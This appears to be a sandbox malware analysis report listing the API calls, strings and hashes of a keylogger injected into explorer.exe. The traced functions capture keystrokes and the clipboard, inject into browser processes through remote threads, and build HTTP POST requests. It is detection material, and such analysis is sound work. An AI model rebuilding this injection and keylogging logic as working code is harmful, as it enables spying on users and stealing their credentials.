Instruction Fuzzy Hash: D351F531605301AFCB14EFB0DD89ABE77A9EB54740F04062BF957873A1EA319E06D762

Function 00AD10A5 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 151
stringsleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00AD2A09: GetProcessHeap.KERNEL32(00000008,0000A000,00AD10BF), ref: 00AD2A0C
Part of subcall function 00AD2A09: RtlAllocateHeap.NTDLL(00000000), ref: 00AD2A13

wsprintfA.USER32 ref: 00AD10E7

Part of subcall function 00AD276D: OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 00AD2777
Part of subcall function 00AD276D: MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,00AD10FE), ref: 00AD2789

RtlMoveMemory.NTDLL(00000000,0000000C,-00000001), ref: 00AD1155
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00AD1160
Process32First.KERNEL32(00000000,?), ref: 00AD117F
CharLowerA.USER32(?), ref: 00AD1199
lstrcmpiA.KERNEL32(?,explorer.exe), ref: 00AD11B5
lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 00AD1212
Process32Next.KERNEL32(00000000,00000128), ref: 00AD126C
CloseHandle.KERNEL32(00000000), ref: 00AD127F
Sleep.KERNELBASE(000003E8), ref: 00AD129F

Strings

microsoftedgecp.exe, xrefs: 00AD1208
keylog_rules=, xrefs: 00AD110D
explorer.exe, xrefs: 00AD11AB
%s%s, xrefs: 00AD10E1
|:|, xrefs: 00AD1125

Memory Dump Source

Source File: 00000010.00000002.3873768309.0000000000AD1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AD1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_ad1000_explorer.jbxd

Similarity

API ID: FileHeapProcess32lstrcmpi$AllocateCharCloseCreateFirstHandleLowerMappingMemoryMoveNextOpenProcessSleepSnapshotToolhelp32Viewwsprintf
String ID: %s%s$explorer.exe$keylog_rules=$microsoftedgecp.exe$|:|
API String ID: 3018447944-2805246637
Opcode ID: 757e87ccefaeb9ca4a128df135a99f3c774ae1b16e4cc74cec5641d32284e429
Instruction ID: 981b0d1f1218fe9351cef2fbbca5a8de2276a52b5e981e2aa08daa44bfac3bf6
Opcode Fuzzy Hash: 757e87ccefaeb9ca4a128df135a99f3c774ae1b16e4cc74cec5641d32284e429
Instruction Fuzzy Hash: FD41C2316053016FCB14EFB49D85ABE77AAEB94740F00062AF953873E1EB319E06D762

Function 00AD9AE0 Relevance: 6.2, APIs: 4, Instructions: 194
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000010.00000002.3873768309.0000000000AD8000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AD8000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_ad8000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8b7a89c90ef100450692ea287cee9b5d9519901d37171806cdf852f9f6d1236
Instruction ID: dcf949fde62d4c8e9b0a9834aa6dca336db60c033d79fbba63b0084a21265db4
Opcode Fuzzy Hash: b8b7a89c90ef100450692ea287cee9b5d9519901d37171806cdf852f9f6d1236
Instruction Fuzzy Hash: 2B511571A542524ED7219B78DCC07A2B7A4EB52324B29073BC5E7CB3C6E7A4DC06C7A0

Function 00AD276D Relevance: 3.0, APIs: 2, Instructions: 23
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 00AD2777
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,00AD10FE), ref: 00AD2789

Memory Dump Source

Source File: 00000010.00000002.3873768309.0000000000AD1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AD1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_ad1000_explorer.jbxd

Similarity

API ID: File$MappingOpenView
String ID:
API String ID: 3439327939-0
Opcode ID: aeacee4600423ef30d848265fe0b78d20a320dbac1644743223c60765a33e169
Instruction ID: a722d954eda20a2025bdff3ab0fc998377f511da4c0c8efb90ee115ef8a069ff
Opcode Fuzzy Hash: aeacee4600423ef30d848265fe0b78d20a320dbac1644743223c60765a33e169
Instruction Fuzzy Hash: 2ED01732702231BBE7349BBB6C0CF87BEADDF86AE1B010026B50ED2150D6608811C2F0

Function 00AD275A Relevance: 3.0, APIs: 2, Instructions: 8
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

UnmapViewOfFile.KERNEL32(00000000,?,00AD129A,00000001), ref: 00AD275E
CloseHandle.KERNELBASE(?,?,00AD129A,00000001), ref: 00AD2765

Memory Dump Source

Source File: 00000010.00000002.3873768309.0000000000AD1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AD1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_ad1000_explorer.jbxd

Similarity

API ID: CloseFileHandleUnmapView
String ID:
API String ID: 2381555830-0
Opcode ID: fe850e4490e312c0a6ebf35e1bbec0dbac0f5a3e02e732d8146acbd1f339428e
Instruction ID: 140dd3a27f513584f965a6ffcacfc2a97f9b5543de963e77fcc9919c7306e8f6
Opcode Fuzzy Hash: fe850e4490e312c0a6ebf35e1bbec0dbac0f5a3e02e732d8146acbd1f339428e
Instruction Fuzzy Hash: D0B0123340703097CB14E7B47C0C8DF3F28EE492213094156F10F8101047240E0386FA

Function 00AD2A09 Relevance: 3.0, APIs: 2, Instructions: 6
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000008,0000A000,00AD10BF), ref: 00AD2A0C
RtlAllocateHeap.NTDLL(00000000), ref: 00AD2A13

Memory Dump Source

Source File: 00000010.00000002.3873768309.0000000000AD1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AD1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_ad1000_explorer.jbxd

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: ff816bb2562cf74fbd3000a6a73b06514199d0d10df51f2e3d49d56520b8d67e
Instruction ID: 4f1631ec499e05406bbb1bf93f316aa005135b57272ad3a0875701732094770c
Opcode Fuzzy Hash: ff816bb2562cf74fbd3000a6a73b06514199d0d10df51f2e3d49d56520b8d67e
Instruction Fuzzy Hash: 63A012B26011006BDD0497E0BD0DF053718AB40B01F0040017207C00508D7001058722

Non-executed Functions

Function 00AD18BF Relevance: 47.5, APIs: 23, Strings: 4, Instructions: 208
injectionnativesleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00AD2724: VirtualQuery.KERNEL32(00000000,?,0000001C,?,?,?,00000000,00AD29F3,-00000001,00AD128C), ref: 00AD2731

OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,?,00000000,00000001), ref: 00AD18F4
NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 00AD192F
NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 00AD19BF
RtlMoveMemory.NTDLL(00000000,00AD3638,00000016), ref: 00AD19E6
RtlMoveMemory.NTDLL(-00000016,00000363), ref: 00AD1A0E
NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 00AD1A1E
CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00AD1A38
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?,00000000), ref: 00AD1A40
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00AD1A4E
Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00AD1A55
GetModuleHandleA.KERNEL32(ntdll,atan,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 00AD1A6B
GetProcAddress.KERNEL32(00000000), ref: 00AD1A72
ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00AD1A88
WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00AD1AB2
CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00AD1AC5
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00AD1ACC
Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00AD1AD3
WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00AD1AE7
CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00AD1AFE
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00AD1B0B
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00AD1B11
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00AD1B17
CloseHandle.KERNEL32(00000000,?,00000000), ref: 00AD1B1A

Strings

opera_shared_counter, xrefs: 00AD1A31
0-FwP,Fw, xrefs: 00AD19B6
ntdll, xrefs: 00AD1A66
atan, xrefs: 00AD1A61

Memory Dump Source

Source File: 00000010.00000002.3873768309.0000000000AD1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AD1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_ad1000_explorer.jbxd

Similarity

API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
String ID: 0-FwP,Fw$atan$ntdll$opera_shared_counter
API String ID: 1066286714-1020849959
Opcode ID: ccf94f6b5607fe137411f10768fc2ae3dd01c66d928c616d6c89fb92a69996a8
Instruction ID: 4de816a18bf1b77accd8e7ff6782e92323a9817cbf1d6ae4f27e9940f612e6ca
Opcode Fuzzy Hash: ccf94f6b5607fe137411f10768fc2ae3dd01c66d928c616d6c89fb92a69996a8
Instruction Fuzzy Hash: 57618D72605305BFD710DFA49C84E6BBBECEB89754F00052AF94AD3291D674DE05CBA2

Function 00AD2799 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 68
encryptionstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 00AD27B5
CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 00AD27CD
lstrlen.KERNEL32(?,00000000), ref: 00AD27D5
CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 00AD27E0
CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 00AD27FA
wsprintfA.USER32 ref: 00AD2811
CryptDestroyHash.ADVAPI32(?), ref: 00AD282A
CryptReleaseContext.ADVAPI32(?,00000000), ref: 00AD2834

Strings

%02X, xrefs: 00AD280B

Memory Dump Source

Source File: 00000010.00000002.3873768309.0000000000AD1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AD1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_ad1000_explorer.jbxd

Similarity

API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
String ID: %02X
API String ID: 3341110664-436463671
Opcode ID: 931139e1728463be9e1df3082690a200723c2c54b50aeaebb0d7f81bfde92f6f
Instruction ID: e1e67316a9664007b06375d3e13d806e9f9d556416248f4e54f5cd37f7b794ff
Opcode Fuzzy Hash: 931139e1728463be9e1df3082690a200723c2c54b50aeaebb0d7f81bfde92f6f
Instruction Fuzzy Hash: 96111972901108BFDB11DBD5EC89EAEBBBCEB48311F104066F606E2150D6714F469B61

Function 00AD162B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00AD1652
ToUnicode.USER32(0000001B,?,?,?,00000009,00000000), ref: 00AD167A

Strings

, xrefs: 00AD1699

Memory Dump Source

Source File: 00000010.00000002.3873768309.0000000000AD1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AD1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_ad1000_explorer.jbxd

Similarity

API ID: KeyboardStateUnicode
String ID:
API String ID: 3453085656-3916222277
Opcode ID: 326bf676470d72a661c49ddfb230dbd0cdc5d9a1ed9bd2b2c548ba6c789a3157
Instruction ID: 45c107532b26b707f0087c68535d1c604da2ab910d1dc7ad393c4c7c8462bce3
Opcode Fuzzy Hash: 326bf676470d72a661c49ddfb230dbd0cdc5d9a1ed9bd2b2c548ba6c789a3157
Instruction Fuzzy Hash: CF01803290121ABBDF34CB55DD45BFB73BCAF45B00F08441BE903E2251D730EA459AA2

Function 00AD13AE Relevance: 38.6, APIs: 17, Strings: 5, Instructions: 144
libraryloaderthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlZeroMemory.NTDLL(00AD5013,0000001C), ref: 00AD13C8
VirtualQuery.KERNEL32(00AD13AE,?,0000001C), ref: 00AD13DA
GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 00AD140B
GetCurrentProcessId.KERNEL32(00000004), ref: 00AD141C
wsprintfA.USER32 ref: 00AD1433
CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 00AD1448
GetLastError.KERNEL32 ref: 00AD144E
RtlInitializeCriticalSection.NTDLL(00AD582C), ref: 00AD1465
Sleep.KERNEL32(000001F4), ref: 00AD1489
GetModuleHandleA.KERNEL32(user32.dll,TranslateMessage), ref: 00AD14A6
GetProcAddress.KERNEL32(00000000), ref: 00AD14AF
GetModuleHandleA.KERNEL32(user32.dll,GetClipboardData), ref: 00AD14D0
GetProcAddress.KERNEL32(00000000), ref: 00AD14D3
GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00AD14F1
CreateThread.KERNEL32(00000000,00000000,Function_0000082D,00000000,00000000,00000000), ref: 00AD150D
CloseHandle.KERNEL32(00000000), ref: 00AD1514
RtlExitUserThread.NTDLL(00000000), ref: 00AD152A

Strings

GetClipboardData, xrefs: 00AD14C6
user32.dll, xrefs: 00AD14A1, 00AD14CB
%s%d%d%d, xrefs: 00AD142D
kernel32.dll, xrefs: 00AD14EC
TranslateMessage, xrefs: 00AD149C

Memory Dump Source

Source File: 00000010.00000002.3873768309.0000000000AD1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AD1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_ad1000_explorer.jbxd

Similarity

API ID: HandleModule$AddressCreateProcThread$CloseCriticalCurrentErrorExitFileInitializeLastMemoryMutexNameProcessQuerySectionSleepUserVirtualZerowsprintf
String ID: %s%d%d%d$GetClipboardData$TranslateMessage$kernel32.dll$user32.dll
API String ID: 3628807430-1779906909
Opcode ID: 4e87b1ac48e819e3636f94e514d958592bf89ba4f8649b184ba52e94d652c8d7
Instruction ID: 40fb575c5df861302a473e2568aeab21557fc69a5fe085fdb050e00e028816a1
Opcode Fuzzy Hash: 4e87b1ac48e819e3636f94e514d958592bf89ba4f8649b184ba52e94d652c8d7
Instruction Fuzzy Hash: 9B41A2B1A01304BFDB10EBB5ED19E6E3BA9FB94751B00442BF50786391DB759902CBA2

Function 00AD16B9 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 90
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlEnterCriticalSection.NTDLL(00AD582C), ref: 00AD16C4
lstrlenW.KERNEL32 ref: 00AD16DB
lstrlenW.KERNEL32 ref: 00AD16F3
wsprintfW.USER32 ref: 00AD1743
GetForegroundWindow.USER32 ref: 00AD174E
GetWindowTextW.USER32(00000000,00AD5850,00000800), ref: 00AD1767
GetClassNameW.USER32(00000000,00AD5850,00000800), ref: 00AD1774
lstrcmpW.KERNEL32(00AD5020,00AD5850), ref: 00AD1781
lstrcpyW.KERNEL32(00AD5020,00AD5850), ref: 00AD178D
wsprintfW.USER32 ref: 00AD17AD
lstrcatW.KERNEL32 ref: 00AD17C6
RtlLeaveCriticalSection.NTDLL(00AD582C), ref: 00AD17D3

Strings

%s%s%s, xrefs: 00AD1738
Clipboard -> , xrefs: 00AD1730
%s%s%s%s, xrefs: 00AD17A2
New Window Caption -> , xrefs: 00AD179A

Memory Dump Source

Source File: 00000010.00000002.3873768309.0000000000AD1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AD1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_ad1000_explorer.jbxd

Similarity

API ID: CriticalSectionWindowlstrlenwsprintf$ClassEnterForegroundLeaveNameTextlstrcatlstrcmplstrcpy
String ID: Clipboard -> $ New Window Caption -> $%s%s%s$%s%s%s%s
API String ID: 2651329914-3371406555
Opcode ID: 974c750f3f8bc861e043576c9601ba69492cbb39801c426f8d6f77871a794835
Instruction ID: 21ee5494c31438ab744d23c67604ca3e6bbaaa12444ce9cdc4682bbfa570b362
Opcode Fuzzy Hash: 974c750f3f8bc861e043576c9601ba69492cbb39801c426f8d6f77871a794835
Instruction Fuzzy Hash: 6521D636902614BFDB20ABB5FC89E2F3B69FB41B557044027F40392371DA218E03DBA2

Function 00AD25F1 Relevance: 15.1, APIs: 10, Instructions: 51
threadprocessinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 00AD2603
GetCurrentThreadId.KERNEL32 ref: 00AD260B
CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 00AD261B
Thread32First.KERNEL32(00000000,0000001C), ref: 00AD2629
OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 00AD2648
SuspendThread.KERNEL32(00000000), ref: 00AD2658
CloseHandle.KERNEL32(00000000), ref: 00AD2667
Thread32Next.KERNEL32(00000000,0000001C), ref: 00AD2677
CloseHandle.KERNEL32(00000000), ref: 00AD2682

Memory Dump Source

Source File: 00000010.00000002.3873768309.0000000000AD1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AD1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_ad1000_explorer.jbxd

Similarity

API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
String ID:
API String ID: 1467098526-0
Opcode ID: 3be5ba4c3db29011d4e5797c08115e0d867728b0a2d6416401e04dd48dc5ba0d
Instruction ID: 809f47a19ae601f42556b847c9b3818abc0130ba44c01573b3c1a0050443b934
Opcode Fuzzy Hash: 3be5ba4c3db29011d4e5797c08115e0d867728b0a2d6416401e04dd48dc5ba0d
Instruction Fuzzy Hash: 93112A72406300EBDB11DFA0AC48B6ABBB4EB95711F04446BFA4792250D7348A4ACBA7

Function 00AD20A1 Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 283
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00AD2A09: GetProcessHeap.KERNEL32(00000008,0000A000,00AD10BF), ref: 00AD2A0C
Part of subcall function 00AD2A09: RtlAllocateHeap.NTDLL(00000000), ref: 00AD2A13

Part of subcall function 00AD298A: lstrlen.KERNEL32(00AD4FE2,?,00000000,00000000,00AD20DD,75568A60,00AD4FE2,00000000), ref: 00AD2992
Part of subcall function 00AD298A: MultiByteToWideChar.KERNEL32(00000000,00000000,00AD4FE2,00000001,00000000,00000000), ref: 00AD29A4

Part of subcall function 00AD24CC: RtlZeroMemory.NTDLL(?,00000018), ref: 00AD24DE

RtlZeroMemory.NTDLL(?,0000003C), ref: 00AD2139
wsprintfW.USER32 ref: 00AD2272
wsprintfW.USER32 ref: 00AD22DD
RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 00AD23A7

Strings

Accept: */*Referer: %S, xrefs: 00AD2268
Content-Type: application/x-www-form-urlencoded, xrefs: 00AD2301
POST, xrefs: 00AD2223
Host: %s, xrefs: 00AD22D7

Memory Dump Source

Source File: 00000010.00000002.3873768309.0000000000AD1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AD1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_ad1000_explorer.jbxd

Similarity

API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
API String ID: 4204651544-1701262698
Opcode ID: 904a610866e3abe835ea2867a9fc57c64b71aee06209025f0886e241337df0a1
Instruction ID: 2b4b51aca24f34c74a5105e413acb9b590b4bae86628b5f7be7be572d9881235
Opcode Fuzzy Hash: 904a610866e3abe835ea2867a9fc57c64b71aee06209025f0886e241337df0a1
Instruction Fuzzy Hash: A6A15A71609341AFDB10DFA8D984A6BBBE8FF98740F00092EF986D7351DA74DA05CB52

Function 00AD12AE Relevance: 7.6, APIs: 5, Instructions: 93
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00AD29BD: VirtualAlloc.KERNEL32(00000000,00040744,00003000,00000040,00AD12D9,00000000,00000000,?,00000001), ref: 00AD29C7

lstrlen.KERNEL32(00000000,00000000,00000000,?,00000001), ref: 00AD12DC

Part of subcall function 00AD2A09: GetProcessHeap.KERNEL32(00000008,0000A000,00AD10BF), ref: 00AD2A0C
Part of subcall function 00AD2A09: RtlAllocateHeap.NTDLL(00000000), ref: 00AD2A13

PathMatchSpecA.SHLWAPI(?,00000000), ref: 00AD138A

Part of subcall function 00AD2841: lstrlen.KERNEL32(00000000,?,?,00000001,00000000,00AD1119,00000001), ref: 00AD2850
Part of subcall function 00AD2841: lstrlen.KERNEL32(keylog_rules=,?,?,00000001,00000000,00AD1119,00000001), ref: 00AD2855

RtlZeroMemory.NTDLL(00000000,00000104), ref: 00AD1316
RtlMoveMemory.NTDLL(00000000,?,?), ref: 00AD1332

Part of subcall function 00AD2569: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00AD136E), ref: 00AD2591
Part of subcall function 00AD2569: RtlMoveMemory.NTDLL(00000FA4,00000000,00000000), ref: 00AD259A

RtlMoveMemory.NTDLL(00000000,?,?), ref: 00AD135F

Memory Dump Source

Source File: 00000010.00000002.3873768309.0000000000AD1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AD1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_ad1000_explorer.jbxd

Similarity

API ID: Memorylstrlen$Move$Heap$AllocAllocateMatchPathProcessSpecVirtualZero
String ID:
API String ID: 2993730741-0
Opcode ID: 17fc1031f4adaf869b650120cd6c4a8a368eedff9bc2f3a800e6a6732a0f2433
Instruction ID: 6c3ccadfb3c940531d285ff5e4767449fdb8b2c2fed62d1d6e63455bdbe7f4ee
Opcode Fuzzy Hash: 17fc1031f4adaf869b650120cd6c4a8a368eedff9bc2f3a800e6a6732a0f2433
Instruction Fuzzy Hash: 3C21AB71704202AFC744EF689955A7EB7EAAB94700B10092FF853D7342DB34DD0A8BA2

Function 00AD1581 Relevance: 7.6, APIs: 5, Instructions: 66
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalLock.KERNEL32(00000000), ref: 00AD15A9
lstrlenW.KERNEL32(00000000), ref: 00AD15C6
lstrcatW.KERNEL32(00000000,00000000), ref: 00AD15DC
lstrlenW.KERNEL32(00000000), ref: 00AD1600
GlobalUnlock.KERNEL32(00000000), ref: 00AD161C

Memory Dump Source

Source File: 00000010.00000002.3873768309.0000000000AD1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AD1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_ad1000_explorer.jbxd

Similarity

API ID: Globallstrlen$LockUnlocklstrcat
String ID:
API String ID: 1114890469-0
Opcode ID: 43cf801dc0d8a14000e39b151e1a2863d4ea69955ef3cf7127cea576988ed717
Instruction ID: f5661cefa35b44c177039d2554237e830f15fcaf52f1779bf35793730cab34a7
Opcode Fuzzy Hash: 43cf801dc0d8a14000e39b151e1a2863d4ea69955ef3cf7127cea576988ed717
Instruction Fuzzy Hash: 3E018436A051117B9A25A7B97E986BE73AEEFD67157084037F80793312DE29CD038351

Function 00AD1BBD Relevance: 6.1, APIs: 4, Instructions: 101
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlMoveMemory.NTDLL(?,?,?), ref: 00AD1BF4
LoadLibraryA.KERNEL32(?,00AD5848,00000000,00000000,75572EE0,00000000,00AD19B6,?,?,?,00000001,?,00000000), ref: 00AD1C1C
GetProcAddress.KERNEL32(00000000,-00000002), ref: 00AD1C49
LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 00AD1C9A

Memory Dump Source

Source File: 00000010.00000002.3873768309.0000000000AD1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AD1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_ad1000_explorer.jbxd

Similarity

API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
String ID:
API String ID: 3827878703-0
Opcode ID: fd56321ac0c084ae7d41c47e5618daa107e64d018b22484870ce74b644faa369
Instruction ID: 0fb5645f990e56b8e18fe6059ad589a9f6999ec9b8fb00bddc08baede41eca58
Opcode Fuzzy Hash: fd56321ac0c084ae7d41c47e5618daa107e64d018b22484870ce74b644faa369
Instruction Fuzzy Hash: 81318E72750616BFCB18CF29C9C4B66B7A8BF15315B14452EE857C7300D731E846CBA0

Function 00AD182D Relevance: 6.0, APIs: 4, Instructions: 42sleepstringCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(00AD582C), ref: 00AD1839
lstrlenW.KERNEL32 ref: 00AD1845
RtlLeaveCriticalSection.NTDLL(00AD582C), ref: 00AD18A9
Sleep.KERNEL32(00007530), ref: 00AD18B4

Memory Dump Source

Source File: 00000010.00000002.3873768309.0000000000AD1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AD1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_ad1000_explorer.jbxd

Similarity

API ID: CriticalSection$EnterLeaveSleeplstrlen
String ID:
API String ID: 2134730579-0
Opcode ID: 11a740ba562a94ea5f6d14440b941f04920e8ed67ae9cf3ad9dbc083491dfd5d
Instruction ID: d512b7cc58488b51ed9b011c8407d2d3e25fcf822daf32756b582f093e19bd26
Opcode Fuzzy Hash: 11a740ba562a94ea5f6d14440b941f04920e8ed67ae9cf3ad9dbc083491dfd5d
Instruction Fuzzy Hash: AE016271E12500AFD724E7F5EE5AA6E3BA9EB51740714402BF407C7361DA349E02EBA2

Function 00AD26C9 Relevance: 6.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000400,00000000,?,?,00000001,?,00000000,00AD11DD), ref: 00AD26DB
IsWow64Process.KERNEL32(000000FF,?), ref: 00AD26ED
IsWow64Process.KERNEL32(00000000,?), ref: 00AD2700
CloseHandle.KERNEL32(00000000), ref: 00AD2716

Memory Dump Source

Source File: 00000010.00000002.3873768309.0000000000AD1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AD1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_ad1000_explorer.jbxd

Similarity

API ID: Process$Wow64$CloseHandleOpen
String ID:
API String ID: 331459951-0
Opcode ID: c49f783264effb35a44252a9d69e5644785625e7b994c750a478aaa920547c6e
Instruction ID: f9033837e4f6e5f3f9b94bc64a9eb0cc4b3e4754d40fcab41cb8ec56cd6f3d13
Opcode Fuzzy Hash: c49f783264effb35a44252a9d69e5644785625e7b994c750a478aaa920547c6e
Instruction Fuzzy Hash: 62F03076902219FF9B21CFE09D489BEB7BCEE05255B14127BE91693240E7314F01D7A1

Function 00AD17DC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00AD2A09: GetProcessHeap.KERNEL32(00000008,0000A000,00AD10BF), ref: 00AD2A0C
Part of subcall function 00AD2A09: RtlAllocateHeap.NTDLL(00000000), ref: 00AD2A13

GetLocalTime.KERNEL32(?,00000000), ref: 00AD17F3
wsprintfW.USER32 ref: 00AD181D

Strings

[%02d.%02d.%d %02d:%02d:%02d], xrefs: 00AD1817

Memory Dump Source

Source File: 00000010.00000002.3873768309.0000000000AD1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AD1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_ad1000_explorer.jbxd

Similarity

API ID: Heap$AllocateLocalProcessTimewsprintf
String ID: [%02d.%02d.%d %02d:%02d:%02d]
API String ID: 377395780-613334611
Opcode ID: 57c814209ac5a04cab4f18ce533f7caee386d6654f3633c4c2fc01d5c24c69a0
Instruction ID: b95a17f3b50ce2723af5cee88368fd26232b5c08131ac05f8d082000827eeea8
Opcode Fuzzy Hash: 57c814209ac5a04cab4f18ce533f7caee386d6654f3633c4c2fc01d5c24c69a0
Instruction Fuzzy Hash: 44F03766900128BA8B1497D99D059FFB3FCEB0C702B00015BFA52D1180E6785A50D3B5

Analysis Process: explorer.exePID: 7252, Parent PID: 4084COMMON

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00E0370C Relevance: 1.6, APIs: 1, Instructions: 75
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs
